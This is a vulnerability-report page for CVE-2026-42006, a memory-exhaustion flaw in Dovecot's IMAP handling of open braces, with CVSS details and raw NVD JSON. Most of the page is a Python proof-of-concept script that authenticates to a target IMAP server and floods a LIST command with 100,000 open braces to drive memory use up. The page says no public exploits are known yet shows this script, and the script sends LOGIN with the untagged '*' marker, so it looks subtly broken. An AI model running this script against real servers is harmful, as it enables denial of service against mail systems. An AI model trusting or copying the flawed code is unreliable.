Security Vulnerability Report
CVE-2026-42006 CVSS 4.3 MEDIUM

Published: 2026-05-12 14:17:05
Last Modified: 2026-05-12 15:08:23

Description

An attacker can cause uncontrolled memory usage with excessive bracing over IMAP. The fix in CVE-2026-27857 was incomplete, only blocking one way of doing this, so there was still another way left open. In particular, the fix was for closing braces, but you could still use open braces to bypass the limit. Using excessive bracing, an attacker can cause memory usage up to the configured memory limit. Install a fixed version, or configure vsz_limit for the imap process to a low value. No publicly available exploits are known.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Dovecot versions where CVE-2026-27857 was applied but CVE-2026-42006 fix is missing

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
Proof of Concept for CVE-2026-42006
Demonstrates memory exhaustion via excessive open braces in IMAP.
Note: For educational purposes only.
"""
import socket
import sys


def send_exploit(target, port, username, password):
    print(f"[*] Connecting to {target}:{port}...")
    try:
        # Establish TCP connection to IMAP server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))

        # Read server banner
        banner = s.recv(1024).decode()
        print(f"[+] Server banner: {banner.strip()}")

        # Authenticate
        print(f"[*] Authenticating as {username}...")
        s.send(f"* LOGIN {username} {password}\r\n".encode())
        resp = s.recv(1024).decode()
        if "OK" not in resp:
            print("[-] Authentication failed.")
            return
        print("[+] Authentication successful.")

        # Send payload with excessive open braces
        # Bypasses the fix for CVE-2026-27857 which only blocked closing braces
        print("[*] Sending malicious payload with excessive open braces...")
        # Creating a large string of open braces
        payload = "A001 LIST INBOX " + "{" * 100000 + "}\r\n"
        s.send(payload.encode())

        # Wait for server response or timeout
        print("[+] Payload sent. Monitor server memory usage.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")
    finally:
        s.close()


if __name__ == "__main__":
    if len(sys.argv) != 5:
        print(f"Usage: python3 {sys.argv[0]} <target_ip> <port> <user> <pass>")
        sys.exit(1)
    send_exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4])
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42006", "sourceIdentifier": "[email protected]", "published": "2026-05-12T14:17:04.703", "lastModified": "2026-05-12T15:08:22.857", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An attacker can cause uncontrolled memory usage with excessive bracing over IMAP. The fix in CVE-2026-27857 was incomplete, only blocking one way of doing this, so there was still another way left open. In particular, the fix was for closing braces, but you could still use open braces to bypass the limit. Using excessive bracing, attacker can cause memory usage up to configured memory limit. Install fixed version, or configure vsz_limit for imap process to low value. No publicly available exploits are known."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://documentation.open-xchange.com/dovecot/security/advisories/csaf/2026/oxdc-adv-2026-0002.json", "source": "[email protected]"}]}}